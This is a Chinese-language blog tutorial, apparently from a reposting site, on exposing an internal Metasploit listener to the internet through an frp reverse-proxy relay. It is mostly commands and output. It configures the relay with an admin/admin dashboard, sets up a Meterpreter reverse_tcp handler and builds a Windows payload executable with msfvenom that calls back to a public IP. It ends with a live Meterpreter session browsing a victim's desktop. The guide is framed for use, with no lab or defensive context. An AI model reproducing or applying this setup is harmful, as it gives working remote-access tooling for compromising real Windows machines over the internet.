內網Metasploit映射到外網的方法是什么
這篇文章主要講解了“內網Metasploit映射到外網的方法是什么”,文中的講解內容簡單清晰,易于學習與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學習“內網Metasploit映射到外網的方法是什么”吧!
下載frp
找到最新的releases下載,系統版本自行確認。
下載方法:
wget?https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz tar?zxvf?frp_0.16.1_linux_amd64.tar.gz? cd?frp_0.16.1_linux_amd64
公網服務器配置:
修改配置文件:
[yuyongxr@instance-2?frp_0.16.1_linux_amd64]$?vim?frps.ini? [common] bind_port?=?7000 dashboard_port?=?7500 dashboard_user?=?admin dashboard_pwd?=?admin
啟動服務:
[yuyongxr@instance-2?frp_0.16.1_linux_amd64]$?nohup?./frps?-c?frps.ini?>?log.txt?&
kali linux 配置:
修改配置文件:
kali@kali:~/frp_0.16.1_linux_amd64$?vim?frpc.ini? [common] server_addr?=?xx.xx.xx.xx server_port?=?7000 [msf] type?=?tcp local_ip?=?127.0.0.1 local_port?=?6666 remote_port?=?4446
啟動服務:
kali@kali:~/frp_0.16.1_linux_amd64$?nohup?./frpc?-c?frpc.ini?>?log.txt?&
metasploit配置:
msf5?>?use?exploit/multi/handler? msf5?exploit(multi/handler)?>?set?payload?windows/x64/meterpreter/reverse_tcp payload?=>?windows/x64/meterpreter/reverse_tcp msf5?exploit(multi/handler)?>?set?lhost?127.0.0.1 lhost?=>?127.0.0.1 msf5?exploit(multi/handler)?>?set?lport?6666 lport?=>?6666
生成payload文件:
e2a5e@kali:~$?msfvenom?-p?windows/x64/meterpreter/reverse_tcp?lhost=34.80.29.48?lport=4446?-f?exe?-o?test.exe [-]?No?platform?was?selected,?choosing?Msf::Module::Platform::Windows?from?the?payload [-]?No?arch?selected,?selecting?arch:?x64?from?the?payload No?encoder?or?badchars?specified,?outputting?raw?payload Payload?size:?510?bytes Final?size?of?exe?file:?7168?bytes Saved?as:?test.exe
執行payload文件,測試效果:
msf5?exploit(multi/handler)?>?exploit? [!]?You?are?binding?to?a?loopback?address?by?setting?LHOST?to?127.0.0.1.?Did?you?want?ReverseListenerBindAddress? [*]?Started?reverse?TCP?handler?on?127.0.0.1:6666? [*]?Sending?stage?(206403?bytes)?to?127.0.0.1 [*]?Meterpreter?session?1?opened?(127.0.0.1:6666?->?127.0.0.1:35992)?at?2019-09-03?17:05:39?+0800 meterpreter?>?ls Listing:?C:\Users\win7\Desktop ============================== Mode??????????????Size??????Type??Last?modified??????????????Name ----??????????????----??????----??-------------??????????????---- 100666/rw-rw-rw-??2309??????fil???2019-08-30?11:12:41?+0800??Google?Chrome.lnk 100777/rwxrwxrwx??10916080??fil???2019-08-30?11:57:01?+0800??PCHunter64.exe 40777/rwxrwxrwx???0?????????dir???2019-09-03?16:12:02?+0800??PanDownload 100666/rw-rw-rw-??282???????fil???2018-09-11?09:18:55?+0800??desktop.ini 100777/rwxrwxrwx??7168??????fil???2019-09-03?16:39:18?+0800??test.exe meterpreter?>
感謝各位的閱讀,以上就是“內網Metasploit映射到外網的方法是什么”的內容了,經過本文的學習后,相信大家對內網Metasploit映射到外網的方法是什么這一問題有了更深刻的體會,具體使用情況還需要大家實踐驗證。這里是蝸牛博客,小編將為大家推送更多相關知識點的文章,歡迎關注!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:niceseo99@gmail.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。版權聲明:如無特殊標注,文章均為本站原創,轉載時請以鏈接形式注明文章出處。
評論